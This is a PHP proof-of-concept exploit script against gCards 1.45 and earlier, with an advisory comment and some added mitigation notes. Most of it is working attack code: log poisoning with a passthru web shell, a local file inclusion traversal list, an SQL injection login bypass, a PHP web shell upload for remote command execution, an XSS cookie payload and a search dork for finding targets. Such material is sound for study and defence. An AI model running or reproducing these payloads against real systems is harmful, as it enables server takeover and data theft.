gCards - Multiple Vulnerabilities

Jan 31st, 2015
<?
# gCards <= 1.45 proof-of-concept script (CLI). It automates issues i) and ii)
# from the advisory comment below: arbitrary local file inclusion through
# inc/setLang.php and SQL injection in the admin login. Application-side fixes
# for both: select the language file from a server-side table keyed by a
# validated setLang value instead of a request-populated $lang array, and use a
# parameterised query (no string-built SQL) for the login lookup.
echo "gCards <= 1.45 multiple vulnerabilities\r\n";
echo "by rgod [email protected]\r\n";
echo "site: http://retrogod.altervista.org\r\n\r\n";
echo "Sun-Tzu:\"At first, then, exhibit the coyness of a maiden, until the\r\n";
echo "enemy gives you an opening; afterwards emulate the rapidity of a\r\n";
echo "running hare, and it will be too late for the enemy to oppose you.\"\r\n";

echo "dork: \"powered by gcards\"\r\n\r\n";

/*

explanation:
software site: http://www.gregphoto.net/gcards/index.php

i) vulnerable code in inc/setLang.php:

<?
    if ($page->languageredirect == $_SERVER['PHP_SELF']) {
        if (isset($_GET['setLang'])) $_SESSION['setLang'] = $_GET['setLang'];
    }

    $langFile = $page->relpath.'inc/lang/'.$lang[$_SESSION['setLang']]['file'];

    if (file_exists($langFile)) {
        include_once($langFile);
    }
    else {
        echo "Could not find language file $langFile";
    }
?>

this code is included by the main script, so ... arbitrary local inclusion, poc:

http://[target]/[path]/index.php?setLang=suntzu&lang[suntzu][file]=../../../../../../../../../../../var/log/httpd/access_log

this works regardless of any magic_quotes_gpc settings, apart from open_basedir
restrictions obviously

ii) also we have SQL injection in the admin authentication procedure, admin/loginfunction.php
at lines 28-38:

...
    $username = $_POST['username'];
    $userpass = $_POST['userpass'];
    if ($username && $userpass)
    {
        include('../inc/adodb/adodb.inc.php');     # load code common to ADOdb
        include('../config.php');
        $ADODB_FETCH_MODE = ADODB_FETCH_ASSOC;
        $conn = &ADONewConnection('mysql'); # create a connection
        $conn->Connect($dbhost,$dbuser,$dbpass,$dbdatabase);
        $pass = md5($userpass);
        $sqlstmt = "SELECT role FROM ".$tablePrefix."cardusers WHERE username='$username' AND userpass='$pass'";
...

login as admin typing:

username: 'or'suntzu'='suntzu'/*
password: [whatever]

this works with magic_quotes_gpc=Off

once you are admin, you can upload php files; files are renamed but gCards keeps the
php extension, so you can launch commands from them

iii) XSS:

http://[target]/[path]/index.php?setLang=suntzu&lang[suntzu][file]=%3Cscript%3Ealert(document.cookie)%3C/script%3E

this exploit does the dirty work for i) and ii)

                                                                             */
# Usage banner: host, path, action and at least one command word are required.
if ($argc<5) {
echo "Usage: php ".$argv[0]." host path action cmd OPTIONS\r\n";
echo "host:      target server (ip/hostname)\r\n";
echo "path:      path to gcards\r\n";
echo "action:    1 - launch commands through arbitrary local inclusion\r\n";
echo "               (no php.ini restriction)\r\n";
echo "           2 - launch commands through sql injection/admin auth bypass\r\n";
echo "               (works with magic_quotes_gpc = Off\r\n";
echo "cmd:       a shell command\r\n";
echo "Options:\r\n";
echo "   -p[port]:    specify a port other than 80\r\n";
echo "   -P[ip:port]: specify a proxy\r\n";
echo "Examples:\r\n";
echo "php ".$argv[0]." localhost /gcards/ 2 cat ./../config.php\r\n";
echo "php ".$argv[0]." localhost /gcards/ 1 cat config.php\r\n";
echo "php ".$argv[0]." localhost /gcards/ 1 cat config.php -p81\r\n";
echo "php ".$argv[0]." localhost /gcards/ 1 cat config.php -P1.1.1.1:80\r\n";
# Exit without a message once the usage text has been printed.
die;
}
  93.  
# Silence all PHP diagnostics (failed socket calls would otherwise print),
# lift the execution time limit, and give socket operations a 5 s timeout.
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
  97.  
  98. function quick_dump($string)
  99. {
  100.  $result='';$exa='';$cont=0;
  101.  for ($i=0; $i<=strlen($string)-1; $i++)
  102.  {
  103.   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
  104.   {$result.="  .";}
  105.   else
  106.   {$result.="  ".$string[$i];}
  107.   if (strlen(dechex(ord($string[$i])))==2)
  108.   {$exa.=" ".dechex(ord($string[$i]));}
  109.   else
  110.   {$exa.=" 0".dechex(ord($string[$i]));}
  111.   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  112.  }
  113. return $exa."\r\n".$result;
  114. }
# Shape of a -P argument, "ip:port", checked by sendpacketii() with preg_match.
# The outer parentheses are the PCRE delimiter pair here, not a capture group.
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
/**
 * Send one raw HTTP request and collect the entire response.
 *
 * Connects directly to $host:$port, or to the $proxy ("ip:port", validated
 * against $proxy_regex) when one is set, writes $packet as-is, and stores
 * the full response text in the global $html. There is no return value; a
 * connection failure or an invalid proxy prints a message and ends the script.
 *
 * @param string $packet complete request (request line, headers, body),
 *                       already CRLF-terminated by the caller
 */
function sendpacketii($packet)
{
 global $proxy, $host, $port, $html, $proxy_regex;
 if ($proxy=='') {
   $ock=fsockopen(gethostbyname($host),$port);
   if (!$ock) {
     echo 'No response from '.$host.':'.$port; die;
   }
 }
 else {
   $c = preg_match($proxy_regex,$proxy);
   if (!$c) {
     echo 'Not a valid proxy...';die;
   }
   $parts=explode(':',$proxy);
   echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
   $ock=fsockopen($parts[0],$parts[1]);
   if (!$ock) {
     echo 'No response from proxy...';die;
   }
 }
 fputs($ock,$packet);
 if ($proxy=='') {
   # Direct connection: read line by line until the server closes the socket.
   $html='';
   while (!feof($ock)) {
     $html.=fgets($ock);
   }
 }
 else {
   # Proxy connection: read one byte at a time; the loop only stops once EOF
   # has been reached AND the blank line ending the headers (CRLFCRLF) has
   # been seen, since it continues while either condition is still unmet.
   $html='';
   while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
     $html.=fread($ock,1);
   }
 }
 fclose($ock);
 #debug
 #echo "\r\n".$html;
}
  154.  
  155. function make_seed()
  156. {
  157.   list($usec, $sec) = explode(' ', microtime());
  158.   return (float) $sec + ((float) $usec * 100000);
  159. }
  160.  
# Positional arguments; the usage check above has already ensured they exist.
$host=$argv[1];
$path=$argv[2];
$action=$argv[3];
$cmd="";$port=80;$proxy="";

# Everything from argv[4] on is joined into the command, except arguments whose
# first two characters are "-p" (port) or "-P" (proxy). Note that str_replace
# strips every occurrence of the prefix from the argument, not just the leading one.
for ($i=4; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P"))
{$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
 $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
 $proxy=str_replace("-P","",$argv[$i]);
}
}
$cmd=urlencode($cmd);

# The path must start and end with "/" because "index.php", "admin/..." and
# "images/..." are appended to it verbatim below.
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
# $p is the request target: a plain path for a direct connection, an absolute
# URI when the request goes through a proxy.
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
  183.  
echo "action selected -> ".$action."\r\n";
if ($action=="1")
{
 # Action 1 (issue i): log poisoning followed by local file inclusion. The PHP
 # snippet in $CODE is sent both in the request line and in User-Agent so the
 # web server records it in its access/error log; the include in
 # inc/setLang.php is then pointed at likely log locations. For defenders the
 # observable signature is a request URI or User-Agent containing "<?php" and a
 # lang[...][file] parameter containing "../". Mitigation: resolve setLang
 # against a fixed server-side list and never build include paths from request data.
 echo "[1] Injecting some code in log files...\r\n";
 $CODE ='<?php ob_clean();echo 666;if (get_magic_quotes_gpc()) {$_GET[cmd]=striplashes($_GET[cmd]);}';
 $CODE.='passthru($_GET[cmd]);echo 666;die;?>';
 $packet.="GET ".$p.$CODE." HTTP/1.1\r\n";
 $packet.="User-Agent: ".$CODE."\r\n";
 $packet.="Host: ".$host."\r\n";
 $packet.="Connection: close\r\n\r\n";
 #debug
 #echo quick_dump($packet);
 sendpacketii($packet);

 # fill with possible locations
 # (relative traversal candidates for the include; tried in order until one hits)
 $paths= array (
 "../../../../../../../../../../var/log/httpd/access_log",
 "../../../../../../../../../../var/log/httpd/error_log",
 "../apache/logs/error.log",
 "../apache/logs/access.log",
 "../../apache/logs/error.log",
 "../../apache/logs/access.log",
 "../../../apache/logs/error.log",
 "../../../apache/logs/access.log",
 "../../../../apache/logs/error.log",
 "../../../../apache/logs/access.log",
 "../../../../../../../../../../etc/httpd/logs/acces_log",
 "../../../../../../../../../../etc/httpd/logs/acces.log",
 "../../../../../../../../../../etc/httpd/logs/error_log",
 "../../../../../../../../../../etc/httpd/logs/error.log",
 "../../../../../../../../../../var/www/logs/access_log",
 "../../../../../../../../../../var/www/logs/access.log",
 "../../../../../../../../../../usr/local/apache/logs/access_log",
 "../../../../../../../../../../usr/local/apache/logs/access.log",
 "../../../../../../../../../../var/log/apache/access_log",
 "../../../../../../../../../../var/log/apache/access.log",
 "../../../../../../../../../../var/log/access_log",
 "../../../../../../../../../../var/www/logs/error_log",
 "../../../../../../../../../../var/www/logs/error.log",
 "../../../../../../../../../../usr/local/apache/logs/error_log",
 "../../../../../../../../../../usr/local/apache/logs/error.log",
 "../../../../../../../../../../var/log/apache/error_log",
 "../../../../../../../../../../var/log/apache/error.log",
 "../../../../../../../../../../var/log/access_log",
 "../../../../../../../../../../var/log/error_log"
 );

 # Each candidate is URL-encoded and supplied as the language "file"; the
 # command output is bracketed by "666" markers so it can be cut out of the page.
 for ($i=0; $i<=count($paths)-1; $i++)
 {
   $j=$i+2;
   echo "[".$j."] Trying with ".$paths[$i]."\r\n";
   $xpl=urlencode($paths[$i]);
   $packet ="GET ".$p."index.php?cmd=".$cmd."&setLang=suntzu&lang[suntzu][file]=".$xpl." HTTP/1.0\r\n";
   $packet.="Host: ".$host."\r\n";
   $packet.="Connection: Close\r\n\r\n";
   #debug, shows packets in a nice format
   #echo quick_dump($packet);
   sendpacketii($packet);

   if (strstr($html,"666")){
     echo "Exploit succeeded...\r\n";
     $temp=explode("666",$html);
     echo $temp[1];
     die;
   }
 }

}
else
if ($action=="2")
{   # Action 2 (issue ii): authentication bypass through the string-built login
   # query, then a .php upload via the admin console. Detection points: a POST to
   # admin/admin.php whose username contains a quote and "/*", and an upload to
   # admin/upload.php carrying a .php filename. Mitigation: parameterised login
   # query, an allow-list of image extensions on upload, and no script
   # execution in the images/ directory.
   echo "[1] Injecting some SQL statements in admin login username field...\r\n";
   $sql=urlencode("'or'suntzu'='suntzu'/*");
   $data="username=".$sql;
   $data.="&userpass=suntzu";
   $packet ="POST ".$p."admin/admin.php HTTP/1.1\r\n";
   $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
   $packet.="Host: ".$host."\r\n";
   $packet.="Content-Length: ".strlen($data)."\r\n";
   $packet.="Connection: Close\r\n\r\n";
   $packet.=$data;
   #echo quick_dump($packet);
   sendpacketii($packet);
   # The admin console title in the response is taken as proof of a bypassed login.
   if (strstr($html,"gCards Administration Console"))
   {echo "Sql injection succeeded...\r\n";}
   else
   {die("Not succeeded, maybe we have magic_quotes_gpc on here...\r\n");}
   # Keep only the value of the first Set-Cookie header (text up to the first
   # space, i.e. without its attributes); it is replayed on every admin request.
   $temp=explode("Set-Cookie: ",$html);
   $temp2=explode(" ",$temp[1]);
   $cookie=$temp2[0];
   echo "Cookie -> ".$cookie."\r\n";
   echo "[2] Let's retrieve a category name to upload a file in ...\r\n";
   $packet ="GET ".$p."admin/cards.php HTTP/1.1\r\n";
   $packet.="Host: ".$host."\r\n";
   $packet.="Cookie: ".$cookie."\r\n";
   $packet.="Connection: Close\r\n\r\n";
   #echo quick_dump($packet);
   sendpacketii($packet);
   # The first <option value="..."> on the cards page is used as the category
   # id; fall back to 1 when none is found.
   $temp=explode("<option value=\"",$html);
   $temp2=explode("\"",$temp[1]);
   $catid=$temp2[0];
   echo "catid -> ".$catid."\r\n";
   if ($catid=="") {$catid=1;}
   echo "[3] Uploading a php file...\r\n";
# Multipart body: the same PHP one-liner is submitted as both the card image
# (userfile) and its thumbnail (userthumb). The boundary string must match the
# one given in the Content-Type header built below.
$data='-----------------------------7d613b1d0448
Content-Disposition: form-data; name="MAX_FILE_SIZE"

250000
-----------------------------7d613b1d0448
Content-Disposition: form-data; name="cardname"

suntzu
-----------------------------7d613b1d0448
Content-Disposition: form-data; name="catid"

'.$catid.'
-----------------------------7d613b1d0448
Content-Disposition: form-data; name="userfile"; filename="suntzu.php"
Content-Type: application/octet-stream

<?php echo 666;ini_set("max_execution_time",0);passthru($_GET[cmd]);echo 666;?>
-----------------------------7d613b1d0448
Content-Disposition: form-data; name="userthumb"; filename="suntzu.php"
Content-Type: application/octet-stream

<?php echo 666;ini_set("max_execution_time",0);passthru($_GET[cmd]);echo 666;?>
-----------------------------7d613b1d0448
Content-Disposition: form-data; name="submit"

Upload
-----------------------------7d613b1d0448
';
   $packet ="POST ".$p."admin/upload.php HTTP/1.1\r\n";
   $packet.="Content-Type: multipart/form-data; boundary=---------------------------7d613b1d0448\r\n";
   $packet.="Host: ".$host."\r\n";
   $packet.="Content-Length: ".strlen($data)."\r\n";
   $packet.="Connection: Close\r\n";
   $packet.="Cookie: ".$cookie."\r\n\r\n";
   $packet.=$data;
   #echo quick_dump($packet);
   sendpacketii($packet);
   if (strstr($html,"successfully"))
   {echo "Succeeded...\r\n";}
   else
   {die("For some reason...Not succeeded\r\n");}
   echo "[4] Let's retrieve the new filename ...\r\n";
   $packet ="GET ".$p."admin/cards.php HTTP/1.1\r\n";
   $packet.="Host: ".$host."\r\n";
   $packet.="Cookie: ".$cookie."\r\n";
   $packet.="Connection: Close\r\n\r\n";
   #echo quick_dump($packet);
   sendpacketii($packet);
   # Recover the stored filename: the text after the last "<td>" that precedes
   # the final "suntzu.php" on the cards page is the prefix gCards prepended, so
   # it is re-joined with the original name. The emptiness check that follows
   # cannot trigger, since the suffix is appended unconditionally.
   $temp=explode("suntzu.php",$html);
   $temp2=explode("<td>",$temp[count($temp)-2]);
   $temp=$temp2[count($temp2)-1];
   $newfile=$temp."suntzu.php";
   if ($newfile=="") {die("For some reason, exploit failed...");}
   echo "File renamed to: ".$newfile."\r\n";
   echo "[5] Launch commands ...\r\n";
   # The renamed upload is served from images/; the "666" markers delimit the
   # command output in the response.
   $packet ="GET ".$p."images/".$newfile."?cmd=".$cmd." HTTP/1.1\r\n";
   $packet.="Host: ".$host."\r\n";
   $packet.="Connection: Close\r\n\r\n";
   #echo quick_dump($packet);
   sendpacketii($packet);
   if (strstr($html,"666"))
    {
      echo "Exploit succeeded...\r\n";
      $temp=explode("666",$html);
      echo $temp[1];
      die;
    }
}
else
{die ("Wrong action...\r\n");}
//if you are here...
# Reached only when neither action produced the "666" marker.
echo "Exploit failed...\r\n";
?>